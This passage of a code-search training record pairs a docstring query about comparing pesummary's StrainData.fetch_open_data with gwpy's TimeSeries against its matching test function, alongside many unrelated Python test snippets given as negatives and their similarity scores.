cg_context,\n caplog,\n):\n\n caplog.set_level(logging.INFO)\n\n # GIVEN we want to retrieve a specific flow cell from PDC\n backup_api = BackupAPI(\n encryption_api=mock.Mock(),\n encrypt_dir=cg_context.backup.encrypt_dir.dict(),\n status=mock_store,\n tar_api=mock_tar,\n pdc_api=mock.Mock(),\n flow_cells_dir=\"cg_context.flow_cells_dir\",\n )\n mock_flow_cell.status = FlowCellStatus.REQUESTED\n mock_flow_cell.sequencer_type = Sequencers.NOVASEQ\n backup_api.check_processing.return_value = True\n backup_api.get_archived_encryption_key_path.return_value = archived_key\n backup_api.get_archived_flow_cell_path.return_value = archived_flow_cell\n backup_api.tar_api.run_tar_command.return_value = None\n result = backup_api.fetch_flow_cell(flow_cell=mock_flow_cell)\n\n # THEN no flow cell is taken form statusdb\n mock_get_first_flow_cell.assert_not_called()\n\n # THEN the process to retrieve the flow cell from PDC is started\n assert \"retrieving from PDC\" in caplog.text\n\n # AND when done the status of that flow cell is set to \"retrieved\"\n assert (\n f\"Status for flow cell {mock_flow_cell.name} set to {FlowCellStatus.RETRIEVED}\"\n in caplog.text\n )\n assert mock_flow_cell.status == \"retrieved\"\n\n # AND status-db is updated with the new status\n assert mock_store.session.commit.called\n\n # AND the elapsed time of the retrieval process is returned\n assert result > 0", "def test_technical_indicator_sma_pandas_python2(self, mock_urlopen):\n ti = TechIndicators(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=SMA&symbol=MSFT&interval=15min&time_period=10&series_type=close&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = ti.get_sma(\"MSFT\", interval='15min',\n time_period=10, series_type='close')\n self.assertIsInstance(\n data, 
df, 'Result Data must be a pandas data frame')", "def test_from_spotdb(spotdb_data):\n\n db = spotdb_data\n runs = db.get_all_run_ids()\n gfs = GraphFrame.from_spotdb(spotdb_data, runs[0:2])\n\n assert len(gfs) == 2\n\n metrics = {\"Total time (inc)\", \"Avg time/rank (inc)\"}\n\n assert len(gfs[0].dataframe) > 2\n assert gfs[0].default_metric == \"Total time (inc)\"\n assert metrics < set(gfs[0].dataframe.columns)\n\n assert \"launchdate\" in gfs[0].metadata.keys()", "def test_read_xls(self):\r\n my_tape = Tape()\r\n input_xls = os.path.join(test_files_dir, 'test_tape.xlsx')\r\n my_tape.read_xls(input_xls)\r\n assert_frame_equal(self.test_df, my_tape.dataframe)", "def getDataFrames(sampleparams, shakeparams, predictors, outparams):\n coverage = sampleparams['coverage']\n f = fiona.collection(coverage, 'r')\n cbounds = f.bounds\n f.close()\n dx = sampleparams['dx']\n cb = sampleparams['cb']\n nmax = sampleparams['nmax']\n nsamp = sampleparams['nsamp']\n touch_center = sampleparams['touch_center']\n testpercent = sampleparams['testpercent']\n extent = sampleparams['extent']\n h1 = sampleparams['h1']\n h2 = sampleparams['h2']\n\n yestest, yestrain, notest, notrain, xvar, yvar, pshapes, proj = sampleFromFile(coverage, dx=dx,\n nmax=nmax, testPercent=testpercent, touch_center=touch_center, classBalance=cb, extent=extent,\n Nsamp=nsamp, h1=h1, h2=h2)\n\n traincolumns = OrderedDict()\n testcolumns = OrderedDict()\n\n if (100-testpercent) > 0:\n traincolumns['lat'] = np.concatenate((yestrain[:, 1], notrain[:, 1]))\n traincolumns['lon'] = np.concatenate((yestrain[:, 0], notrain[:, 0]))\n traincolumns['coverage'] = np.concatenate((np.ones_like(yestrain[:, 1]),\n np.zeros_like(notrain[:, 1])))\n\n if testpercent > 0:\n testcolumns['lat'] = np.concatenate((yestest[:, 1], notest[:, 1]))\n testcolumns['lon'] = np.concatenate((yestest[:, 0], notest[:, 0]))\n testcolumns['coverage'] = np.concatenate((np.ones_like(yestest[:, 1]), np.zeros_like(notest[:, 1])))\n\n for predname, predfile in predictors.items():\n ftype = getFileType(predfile)\n if ftype == 'shapefile':\n attribute = predictors[predname+'_attribute']\n shapes = subsetShapes(predfile, cbounds)\n yes_test_samples = sampleShapes(shapes, yestest, attribute)\n no_test_samples = sampleShapes(shapes, notest, attribute)\n yes_train_samples = sampleShapes(shapes, yestrain, attribute)\n no_train_samples = sampleShapes(shapes, notrain, attribute)\n testcolumns[predname] = np.squeeze(np.concatenate((yes_test_samples, no_test_samples)))\n traincolumns[predname] = np.squeeze(np.concatenate((yes_train_samples, no_train_samples)))\n elif ftype == 'grid':\n method = 'nearest'\n if predname+'_sampling' in predictors:\n method = predictors[predname+'_sampling']\n\n if testpercent > 0:\n yes_test_samples = sampleGridFile(predfile, yestest, method=method)\n no_test_samples = sampleGridFile(predfile, notest, method=method)\n testcolumns[predname] = np.squeeze(np.concatenate((yes_test_samples, no_test_samples)))\n\n if (100-testpercent) > 0:\n yes_train_samples = sampleGridFile(predfile, yestrain, method=method)\n no_train_samples = sampleGridFile(predfile, notrain, method=method)\n traincolumns[predname] = np.squeeze(np.concatenate((yes_train_samples, no_train_samples)))\n else:\n continue # attribute or sampling method key\n\n #sample the shakemap\n layers = ['mmi', 'pga', 'pgv', 'psa03', 'psa10', 'psa30']\n shakegrid = ShakeGrid.load(shakeparams['shakemap'], adjust='res')\n for layer in layers:\n yes_test_samples = sampleFromMultiGrid(shakegrid, layer, 
yestest)\n no_test_samples = sampleFromMultiGrid(shakegrid, layer, notest)\n yes_train_samples = sampleFromMultiGrid(shakegrid, layer, yestrain)\n no_train_samples = sampleFromMultiGrid(shakegrid, layer, notrain)\n if testpercent > 0:\n testcolumns[layer] = np.squeeze(np.concatenate((yes_test_samples, no_test_samples)))\n if (100-testpercent) > 0:\n traincolumns[layer] = np.squeeze(np.concatenate((yes_train_samples, no_train_samples)))\n\n dftest = pd.DataFrame(testcolumns)\n dftrain = pd.DataFrame(traincolumns)\n\n return (dftrain, dftest)", "def test_load_dataset():\n\n # Given\n dataset_file_name = core.config.app_config.TESTING_DATA_FILE\n\n # When\n subject = utils.load_dataset(filename=dataset_file_name)\n\n # Then\n assert isinstance(subject, pd.DataFrame)\n assert subject.shape == (5940, 41)", "async def test_fetch_dataset_metadata_call(self):\n pool = asynctest.CoroutineMock()\n pool.acquire().__aenter__.return_value = Connection()\n result = await fetch_dataset_metadata(pool, None, None)\n # for now it can return empty dataset\n # in order to get a response we will have to mock it\n # in Connection() class\n self.assertEqual(result, [])", "def test_open_close():\n spds = SDPS(VirtualDevice(), 'MX28')\n assert not spds.is_opened\n spds.open()\n assert spds.is_opened\n spds.open()\n #TODO: analyze caplog, there should be no new records\n assert spds.is_opened", "def test_fileobj_not_closed(self):\n\n f = open(self.data(\"test0.fits\"), \"rb\")\n _ = fits.getdata(f)\n assert not f.closed\n\n f.seek(0)\n _ = fits.getheader(f)\n assert not f.closed\n\n f.close() # Close it now", "def testIrradianceFetch(self):\n\n timeCol = 'timestamp'\n rows = []\n for row in self.aggregator.rawData(dataType = 'irradiance',\n orderBy = [timeCol, 'sensor_id'],\n timestampCol = timeCol,\n startDate = self.testStart,\n endDate = self.testEnd):\n rows.append(row)\n self.assertIsNotNone(rows, 'Rows are present.')", "def fetch():\n return True", "def test_fetch_flow_cell_integration(\n mock_store,\n mock_flow_cell,\n mock_tar,\n mock_query,\n archived_key,\n archived_flow_cell,\n cg_context,\n pdc_query,\n caplog,\n):\n\n caplog.set_level(logging.INFO)\n\n # GIVEN we want to retrieve a specific flow cell from PDC\n backup_api = BackupAPI(\n encryption_api=mock.Mock(),\n encrypt_dir=cg_context.backup.encrypt_dir.dict(),\n status=mock_store,\n tar_api=mock_tar,\n pdc_api=mock.Mock(),\n flow_cells_dir=cg_context.flow_cells_dir,\n )\n mock_flow_cell.status = FlowCellStatus.REQUESTED\n mock_flow_cell.sequencer_type = Sequencers.NOVASEQ\n mock_store.get_flow_cells_by_statuses.return_value.count.return_value = 0\n mock_query.return_value = pdc_query\n\n backup_api.tar_api.run_tar_command.return_value = None\n result = backup_api.fetch_flow_cell(flow_cell=mock_flow_cell)\n\n # THEN the process to retrieve the flow cell from PDC is started\n assert \"retrieving from PDC\" in caplog.text\n\n # AND when done the status of that flow cell is set to \"retrieved\"\n assert (\n f\"Status for flow cell {mock_flow_cell.name} set to {FlowCellStatus.RETRIEVED}\"\n in caplog.text\n )\n assert mock_flow_cell.status == \"retrieved\"\n\n # AND status-db is updated with the new status\n assert mock_store.session.commit.called\n\n # AND the elapsed time of the retrieval process is returned\n assert result > 0", "def test_crypto_currencies_pandas_python3(self, mock_urlopen):\n cc = CryptoCurrencies(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = 
\"https://www.alphavantage.co/query?function=DIGITAL_CURRENCY_INTRADAY&symbol=BTC&market=CNY&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = cc.get_digital_currency_intraday(\n symbol='BTC', market='CNY')\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_view(self):\n symbol = 'NFLX'\n table = 'option'\n path = os.path.join(CLEAN_DIR, '__%s__.h5' % symbol.lower())\n db = pd.HDFStore(path)\n df_valid = db.select('%s/valid/normal' % table)\n df_clean = db.select('%s/clean/normal' % table)\n db.close()\n\n df_date = df_valid[df_valid['date'] == '2015-08-27']\n df_date = df_date[df_date['name'] == 'CALL'].sort_values('ex_date')\n print df_date.to_string(line_width=1000)\n\n df_date = df_clean[df_clean['date'] == '2015-08-27']\n df_date = df_date[df_date['name'] == 'CALL'].sort_values('ex_date')\n print df_date.to_string(line_width=1000)\n\n # self.client.get(reverse('admin:calc_day_iv', kwargs={'symbol': 'GG', 'insert': 0}))", "def test_fetch_flow_cell_no_flow_cells_requested(\n mock_store,\n mock_check_processing,\n mock_get_first_flow_cell,\n caplog,\n):\n\n caplog.set_level(logging.INFO)\n\n # GIVEN we check if a flow cell needs to be retrieved from PDC\n backup_api = BackupAPI(\n encryption_api=mock.Mock(),\n encrypt_dir=mock.Mock(),\n status=mock_store,\n tar_api=mock.Mock(),\n pdc_api=mock.Mock(),\n flow_cells_dir=mock.Mock(),\n )\n\n # WHEN no flow cells are requested\n backup_api.get_first_flow_cell.return_value = None\n backup_api.check_processing.return_value = True\n\n # AND no flow cell has been specified\n mock_flow_cell = None\n\n result = backup_api.fetch_flow_cell(mock_flow_cell)\n\n # THEN no flow cell will be fetched and a log message indicates that no flow cells have been\n # requested\n assert result is None\n assert \"No flow cells requested\" in caplog.text", "def test_from_object_class(self):\n df_test = make_simple_dataframe()\n Base_object = BaseDataClass.from_object(df_test)\n df_read = BaseDataClass.from_object(Base_object).df\n self.assertEqual(\n pd.testing.assert_frame_equal(df_test, df_read),\n None,\n )", "def test_number_of_rows_without_header(self):\n url=\"http://archive.ics.uci.edu/ml/machine-learning-databases/car/car.data\"\n\n reader=requester.url_to_df(url)\n rows,columns=reader.shape\n self.assertEqual(rows,1728)", "def test_read_data():\r\n test_data_r = pd.read_csv('Test_files/test_data.csv')\r\n test_data_c = pd.DataFrame({'id':[1,2,3,4],\r\n 'price':[8000,950,2400,1150],\r\n 'currency':['PLN','GBP','PLN','EU'],\r\n 'quantity':[6,1,1,2],\r\n 'matching_id':[1,3,2,2,]})\r\n\r\n assert_frame_equal(test_data_r, test_data_c)\r\n\r\n test_matching_r= pd.read_csv('Test_files/test_matching.csv')\r\n test_matching_c = pd.DataFrame({'matching_id':[1,2,3],\r\n 'top_priced_count':[1,2,1]})\r\n\r\n assert_frame_equal(test_matching_r,test_matching_c)\r\n\r\n test_currencies_r = pd.read_csv('Test_files/test_currencies.csv')\r\n test_currencies_c = pd.DataFrame({'currency':['GBP','EU','PLN'],\r\n 'ratio':[2.6,2.2,1]})\r\n\r\n assert_frame_equal(test_currencies_r,test_currencies_c)\r\n\r\n return test_data_r,test_matching_r,test_currencies_r", "def test_prepare_essentiality_data(ijr904, combined_dataframe):\n tested_dataframe = essential.prepare_essentiality_data(\n join(dirname(__file__), \"data\", \"essentiality\", \"mock_essential.csv\"), ijr904\n )\n assert tested_dataframe.equals(combined_dataframe)", "def 
test_sector_perfomance_python3(self, mock_urlopen):\n sp = SectorPerformances(key=TestAlphaVantage._API_KEY_TEST)\n url = \"https://www.alphavantage.co/query?function=SECTOR&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = sp.get_sector()\n self.assertIsInstance(\n data, dict, 'Result Data must be a dictionary')", "def test_derive_lookback_window_from_window_and_interval_params(self, mock_get_prices):\n class BuyBelow10(Moonshot):\n \"\"\"\n A basic test strategy that buys below 10.\n \"\"\"\n DB = 'test-db'\n SOME_WINDOW = 100\n SOME_OTHER_WINDOW = 5\n SOME_NONINT_WINDOW = \"foo\" # make sure ignored\n REBALANCE_INTERVAL = \"Q\"\n OTHER_INTERVAL = \"MS\"\n INVALID_INTERNVAL = \"invalid\" # make sure ignored\n\n def prices_to_signals(self, prices):\n signals = prices.loc[\"Close\"] < 10\n return signals.astype(int)\n\n def _mock_get_prices():\n\n dt_idx = pd.DatetimeIndex([\"2018-05-01\",\"2018-05-02\",\"2018-05-03\", \"2018-05-04\"])\n fields = [\"Close\",\"Volume\"]\n idx = pd.MultiIndex.from_product([fields, dt_idx], names=[\"Field\", \"Date\"])\n\n prices = pd.DataFrame(\n {\n \"FI12345\": [\n #Close\n 9,\n 11,\n 10.50,\n 9.99,\n # Volume\n 5000,\n 16000,\n 8800,\n 9900\n ],\n \"FI23456\": [\n # Close\n 9.89,\n 11,\n 8.50,\n 10.50,\n # Volume\n 15000,\n 14000,\n 28800,\n 17000\n\n ],\n },\n index=idx\n )\n\n return prices\n\n def mock_download_master_file(f, *args, **kwargs):\n\n master_fields = [\"Timezone\", \"Symbol\", \"SecType\", \"Currency\", \"PriceMagnifier\", \"Multiplier\"]\n securities = pd.DataFrame(\n {\n \"FI12345\": [\n \"America/New_York\",\n \"ABC\",\n \"STK\",\n \"USD\",\n None,\n None\n ],\n \"FI23456\": [\n \"America/New_York\",\n \"DEF\",\n \"STK\",\n \"USD\",\n None,\n None,\n ]\n },\n index=master_fields\n )\n securities.columns.name = \"Sid\"\n securities.T.to_csv(f, index=True, header=True)\n f.seek(0)\n\n mock_get_prices.return_value = _mock_get_prices()\n\n with patch(\"moonshot.strategies.base.download_master_file\", new=mock_download_master_file):\n results = BuyBelow10().backtest(start_date=\"2018-05-01\", end_date=\"2018-05-04\")\n\n get_prices_call = mock_get_prices.mock_calls[0]\n _, args, kwargs = get_prices_call\n self.assertListEqual(kwargs[\"codes\"], [\"test-db\"])\n self.assertIn(kwargs[\"start_date\"], (\"2017-08-04\", \"2017-08-05\", \"2017-08-06\", \"2017-08-07\")) # 100 + 60ish trading days before requested start_date\n self.assertEqual(kwargs[\"end_date\"], \"2018-05-04\")\n self.assertEqual(kwargs[\"fields\"], ['Open', 'Close', 'Volume'])\n self.assertIsNone(kwargs[\"timezone\"])\n self.assertTrue(kwargs[\"infer_timezone\"])", "def test_fileobj_not_closed(self):\n\n f = open(self.data('test0.fits'), 'rb')\n data = fits.getdata(f)\n assert not f.closed\n\n f.seek(0)\n header = fits.getheader(f)\n assert not f.closed", "def test_download_dataset_partial(tmp_path, monkeypatch):\n\n remote_dataset = Dataset()\n remote_dataset.x = 1\n remote_dataset.y = 2\n\n monkeypatch.setattr(\n pennylane.data.data_manager, \"open_hdf5_s3\", MagicMock(return_value=remote_dataset.bind)\n )\n\n pennylane.data.data_manager._download_dataset(\n \"dataset/path\", tmp_path / \"dataset\", attributes=[\"x\"]\n )\n\n local = Dataset.open(tmp_path / \"dataset\")\n\n assert local.x == 1\n assert not hasattr(local, \"y\")", "def test_fetch_working(suvi_client):\n start = '2019/05/25 00:50'\n end = '2019/05/25 00:52'\n wave = 94 * u.Angstrom\n goes_sat = a.goes.SatelliteNumber.sixteen\n tr = 
a.Time(start, end)\n qr1 = suvi_client.search(tr, a.Instrument.suvi, a.Wavelength(wave), goes_sat, a.Level(2))\n\n # Mock QueryResponse object\n mock_qr = mock_query_object(suvi_client)\n\n # Compare if two objects have the same attribute\n\n mock_qr = mock_qr[0]\n qr = qr1[0]\n\n assert mock_qr['Source'] == qr['Source']\n assert mock_qr['Provider'] == qr['Provider']\n assert mock_qr['Physobs'] == qr['Physobs']\n assert mock_qr['Instrument'] == qr['Instrument']\n assert mock_qr['url'] == qr['url']\n\n assert qr1['Start Time'] == Time(\"2019-05-25T00:52:00.000\")\n assert qr1['End Time'] == Time(\"2019-05-25T00:56:00.000\")\n\n with tempfile.TemporaryDirectory() as tmpdirname:\n download_list = suvi_client.fetch(qr1, path=tmpdirname)\n assert len(download_list) == len(qr1)", "def test_recv(self):\n # Required to get useful test names\n super(TestCisPandasInput_local, self).test_recv()", "def test_time_series_intraday_pandas_python2(self, mock_urlopen):\n ts = TimeSeries(key=TestAlphaVantage._API_KEY_TEST,\n output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=MSFT&interval=1min&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = ts.get_intraday(\n \"MSFT\", interval='1min', outputsize='full')\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_unpacking(n_depthPCs=20, namespace=\"hg38_noEBV\"):\n def unpack_df(bm_small, db, **kwargs):\n cols = list(bm_small.index) + list(bm_small[\"Best Match\"])\n df = db.query(cols)\n packed_df = mutil.PackedFrame(df, **kwargs)\n df = packed_df.unpack()\n bm_final = packed_df.update_colmaps(bm_small, **kwargs)\n return df, bm_final\n from datastack.dbs.rdb import RosettaDBMongo\n db = RosettaDBMongo(host=\"rosetta.hli.io\")\n db.initialize(namespace=namespace)\n\n best_matches = pd.read_table(\"../data_local/visit1_to_visit2_colnames.txt\", sep=\"\\t\", index_col=0)\n \n bm_small = best_matches[(best_matches[\"Group\"] == \"face.v6\") & (~best_matches[\"Best Match\"].str.contains(\"mirror\"))]\n df_v1_v2, bm_final_v1_v2 = unpack_df(bm_small, db,\n from_str=\"visit1\", to_str=\"visit2\", \n maxElements={\"ColorPC\": n_depthPCs, \"DepthPC\": n_depthPCs})\n \n assert pd.Series(bm_final_v1_v2.index).str.contains(\"visit1\").all(), \"From column is wrong format\"\n assert bm_final_v1_v2[\"Best Match\"].str.contains(\"visit2\").all(), \"To column is wrong format\"\n assert (bm_final_v1_v2[\"Score\"] < 100).sum() == 0, \"Did not retrieve exact matches\"\n assert bm_final_v1_v2.shape[0] == 2 * n_depthPCs, \"Got the wrong number of mappings. Expected %s, got %s\" % (2 * n_depthPCs, bm_final_v1_v2.shape[0])\n print \"Passed test 1\"\n # Observed/predicted test\n best_matches = pd.read_table(\"../data_local/pred_to_obs_colnames.txt\", sep=\"\\t\", index_col=0)\n bm_small = best_matches.filter(like=\"Depth\", axis=0)\n\n df_obs_pred, bm_final = unpack_df(bm_small, db, from_str=\".FACE_P.\", to_str=\".FACE.\", \n maxElements={\"DepthPC\": n_depthPCs})\n assert pd.Series(bm_final.index).str.contains(\".FACE_P.\").all(), \"From column is wrong format\"\n assert bm_final[\"Best Match\"].str.contains(\".FACE.\").all(), \"To column is wrong format\"\n assert (bm_final[\"Score\"] < 100).sum() == 0, \"Did not retrieve exact matches\"\n assert bm_final.shape[0] == n_depthPCs, \"Got the wrong number of mappings. 
Expected %s, got %s\" % (n_depthPCs, bm_final.shape[0])\n print \"Passed test 2\"\n print \"Passed all unpacking tests\"", "def getDataframe(self, year = 2014):\r\n \r\n # Retrieve Stat Dataframes\r\n salary_df = self.getSalaryStat(year)\r\n touch_df = self.getPlayerAdvStat('touch', year)\r\n speed_df = self.getPlayerAdvStat('speed', year)\r\n base_df = self.getPlayerBaseStat(year)\r\n team_df = self.getTeamStat(year)\r\n \r\n # Set of Merge Variables to prevent overlap\r\n to_merge_1 = ['PLAYER_NAME', 'AVG_SPEED', 'AVG_SPEED_DEF', 'AVG_SPEED_OFF', \r\n 'DIST_FEET', 'DIST_MILES', 'DIST_MILES_DEF', 'DIST_MILES_OFF',\r\n 'MIN1']\r\n to_merge_2 = ['PLAYER_NAME', 'AGE', 'AST', 'BLK', 'BLKA', 'CFID', 'CFPARAMS', 'DD2',\r\n 'DREB', 'FG3A', 'FG3M', 'FG3_PCT', 'FGA', 'FGM', 'FG_PCT', 'FTA', \r\n 'FTM', 'FT_PCT', 'OREB', 'PF', 'PFD', 'PLUS_MINUS', 'PTS', 'REB', \r\n 'STL', 'TD3', 'TOV', 'W_PCT'] \r\n \r\n player_df = pd.merge(salary_df, \r\n pd.merge(\r\n pd.merge(touch_df, speed_df[to_merge_1], on = 'PLAYER_NAME',how = 'outer'),\r\n base_df[to_merge_2], on = 'PLAYER_NAME', how = 'outer'),\r\n on = 'PLAYER_NAME', how = 'outer')\r\n \r\n all_df = pd.merge(team_df, player_df, on = 'TEAM_ID', suffixes= ['_t', '_p'], how = 'right')\r\n \r\n return all_df", "def test_empty_last_data_frame(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"123\"\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n deproxy_cl.make_request(request=request_body, end_stream=False)\n deproxy_cl.make_request(request=\"\", end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_get_work_from_edition_data(self):\n data = {\"works\": [{\"key\": \"/work/OL1234W\"}]}\n responses.add(\n responses.GET,\n \"https://openlibrary.org/work/OL1234W\",\n json={\"hi\": \"there\"},\n status=200,\n )\n result = self.connector.get_work_from_edition_data(data)\n self.assertEqual(result, {\"hi\": \"there\"})", "def test_technical_indicator_sma_pandas_python3(self, mock_urlopen):\n ti = TechIndicators(\n key=TestAlphaVantage._API_KEY_TEST, output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=SMA&symbol=MSFT&interval=15min&time_period=10&series_type=close&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = ti.get_sma(\"MSFT\", interval='15min',\n time_period=10, series_type='close')\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas data frame')", "def test_rst_frame_in_request(self):\n client = self.get_client(\"deproxy\")\n\n self.start_all_services()\n self.initiate_h2_connection(client)\n\n # client opens streams with id 1, 3 and does not close them\n client.make_request(request=self.post_request, end_stream=False)\n client.stream_id = 3\n client.make_request(request=self.post_request, end_stream=False)\n\n # client send RST_STREAM frame with NO_ERROR code in stream 1 and\n # Tempesta closes it for itself.\n client.h2_connection.reset_stream(stream_id=1, error_code=0)\n client.send_bytes(client.h2_connection.data_to_send())\n\n # Client send DATA frame in stream 3 and it MUST receive response\n client.send_request(\"qwe\", \"200\")\n\n # Tempesta allows creating new streams.\n client.stream_id = 5\n client.send_request(self.post_request, \"200\")\n\n self.assertFalse(\n client.connection_is_closed(), \"Tempesta closed connection after receiving RST_STREAM.\"\n )", "def 
fetch_data(self) -> pd.DataFrame:\r\n os.chdir(r'\\\\192.168.8.90\\投研部\\Jessica\\test_data')\r\n if self.tic in ['RB.CCRI', 'HC.CCRI', 'I.CCRI', 'J.CCRI', 'JM.CCRI', 'ZC.CCRI']:\r\n f = pd.read_hdf('data.h5', 'snc')\r\n if self.tic in ['CU.CCRI', 'ZN.CCRI', 'AL.CCRI', 'NI.CCRI']:\r\n f = pd.read_hdf('data.h5', 'met')\r\n data = f.loc[f.loc[:, 'sec_code'] == self.tic, :]\r\n # extract I.CCRI data\r\n table = pd.pivot_table(data, index=['date'], columns=['factor_code'], values='factor_value')\r\n table = table.sort_values(by='date')\r\n \r\n return table", "def test_load_simulated(dl1_file):\n from ctapipe.io.tableloader import TableLoader\n\n with TableLoader(dl1_file, load_simulated=True) as table_loader:\n table = table_loader.read_subarray_events()\n assert \"true_energy\" in table.colnames\n assert table[\"obs_id\"].dtype == np.int32\n\n table = table_loader.read_telescope_events([8])\n assert \"true_energy\" in table.colnames\n assert \"true_impact_distance\" in table.colnames", "def test_batch_quotes_pandas_python2(self, mock_urlopen):\n ts = TimeSeries(key=TestAlphaVantage._API_KEY_TEST,\n output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=BATCH_STOCK_QUOTES&symbols=MSFT,FB,AAPL&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = ts.get_batch_stock_quotes(symbols=('MSFT', 'FB', 'AAPL'))\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas dataframe')", "def test_data_source_soaps_change_stream_get(self):\n pass", "def fetch_fiber_display_report(start_date, end_date, \r\n fyber_display_publisher_id, \r\n fyber_display_consumer_key, \r\n fyber_display_consumer_secret):\r\n print(f\"Fetching Fyber Display data from {start_date} to {end_date}...\")\r\n start_date = datetime.datetime.fromisoformat(start_date)\r\n end_date = datetime.datetime.fromisoformat(end_date)\r\n \r\n #subtraction is for the time difference - MoPub and Fyber Video are on PST \r\n start_date_unixtime = int(time.mktime(start_date.timetuple()))-14400 \r\n end_date_unixtime = datetime.datetime.timestamp(end_date)\r\n url = 'https://console.inner-active.com/iamp/services/performance/publisher/{}/{}/{}'.format(fyber_display_publisher_id,start_date_unixtime, end_date_unixtime)\r\n headers = {\"Content-type\":\"application/json\",\"Accept\":\"application/json\"}\r\n auth = OAuth1(fyber_display_consumer_key, fyber_display_consumer_secret) \r\n r = requests.get(url, auth=auth, headers=headers)\r\n data = json.loads(r.text)\r\n dataframe = pd.DataFrame(data)\r\n return dataframe" ]
[ "0.73446274", "0.65186745", "0.6414948", "0.6280164", "0.61943877", "0.6105646", "0.5987783", "0.596136", "0.5908009", "0.5907794", "0.59036356", "0.5877466", "0.5877377", "0.5873337", "0.5770271", "0.57309335", "0.57286495", "0.5710138", "0.569773", "0.56320137", "0.5627794", "0.5566823", "0.55614346", "0.55172527", "0.55113566", "0.54898965", "0.5482834", "0.54818475", "0.54653126", "0.5457008", "0.54402673", "0.5403126", "0.53940356", "0.5390514", "0.5388878", "0.5366225", "0.5358595", "0.5342994", "0.5324872", "0.53174347", "0.53170943", "0.5309232", "0.53043914", "0.5300218", "0.528886", "0.52876884", "0.5286138", "0.52849746", "0.5284072", "0.5282268", "0.528089", "0.5278852", "0.52786773", "0.52741206", "0.52694714", "0.5267141", "0.5262917", "0.5262392", "0.5253481", "0.5246118", "0.524433", "0.52433336", "0.5241528", "0.5234293", "0.52334523", "0.5218858", "0.5215905", "0.5214547", "0.5212053", "0.5209077", "0.5208296", "0.5204501", "0.5201517", "0.51993", "0.51960015", "0.5194014", "0.51864815", "0.51783097", "0.5178214", "0.5175748", "0.51742774", "0.51732177", "0.51731944", "0.516773", "0.51636076", "0.51583815", "0.5155783", "0.51501983", "0.5147394", "0.5144577", "0.5144464", "0.5142807", "0.5129394", "0.5128012", "0.51254845", "0.51238894", "0.51224065", "0.51186556", "0.5107196", "0.51026374" ]
0.81294215
0
Test that the gwpy methods are still the same
def test_fetch_open_data(self): args = ["L1", 1126259446, 1126259478] pesummary_data = StrainData.fetch_open_data(*args) gwpy_data = TimeSeries.fetch_open_data(*args) np.testing.assert_almost_equal(pesummary_data.value, gwpy_data.value) np.testing.assert_almost_equal( pesummary_data.times.value, gwpy_data.times.value ) assert isinstance(pesummary_data.gwpy, TimeSeries) np.testing.assert_almost_equal( pesummary_data.gwpy.value, gwpy_data.value ) np.testing.assert_almost_equal( pesummary_data.gwpy.times.value, gwpy_data.times.value ) assert pesummary_data.IFO == "L1" assert list(pesummary_data.strain_dict.keys()) == ["L1"] np.testing.assert_almost_equal( pesummary_data.strain_dict["L1"].value, gwpy_data.value ) np.testing.assert_almost_equal( pesummary_data.strain_dict["L1"].times.value, gwpy_data.times.value )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_method(self):\n self.assertEqual(self.method, 'modified strong collision')", "def test_required_methods(self):", "def test_identical(self):\n write this test!", "def test_class_ne_method(self, test_instances):\n a, b, c = test_instances\n\n assert a != c\n assert b != c\n\n a.__dict__.update(baz=True)\n\n assert a != b", "def test_patch_none():", "def test_instance_method() -> None:\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.__init__) == Signature(\n parameters=[\n Parameter(\n annotation=Parameter.empty,\n default=Parameter.empty,\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n name='self',\n ),\n Parameter(\n annotation=bool,\n default=False,\n kind=Parameter.KEYWORD_ONLY,\n name='is_uncased',\n ),\n Parameter(\n annotation=int,\n default=-1,\n kind=Parameter.KEYWORD_ONLY,\n name='max_vocab',\n ),\n Parameter(\n annotation=int,\n default=0,\n kind=Parameter.KEYWORD_ONLY,\n name='min_count',\n ),\n Parameter(\n annotation=int,\n default=10000,\n kind=Parameter.KEYWORD_ONLY,\n name='n_merge',\n ),\n Parameter(\n annotation=Any,\n default=Parameter.empty,\n kind=Parameter.VAR_KEYWORD,\n name='kwargs',\n ),\n ],\n return_annotation=Signature.empty,\n )\n\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.build_vocab) == inspect.signature(BaseTknzr.build_vocab)\n assert lmp.tknzr._bpe.BPETknzr.build_vocab != BaseTknzr.build_vocab\n\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.dtknz) == inspect.signature(BaseTknzr.dtknz)\n assert lmp.tknzr._bpe.BPETknzr.dtknz != BaseTknzr.dtknz\n\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.tknz) == inspect.signature(BaseTknzr.tknz)\n assert lmp.tknzr._bpe.BPETknzr.tknz != BaseTknzr.tknz", "def test_inherent_instance_method() -> None:\n assert lmp.tknzr._bpe.BPETknzr.dec == BaseTknzr.dec\n assert lmp.tknzr._bpe.BPETknzr.enc == 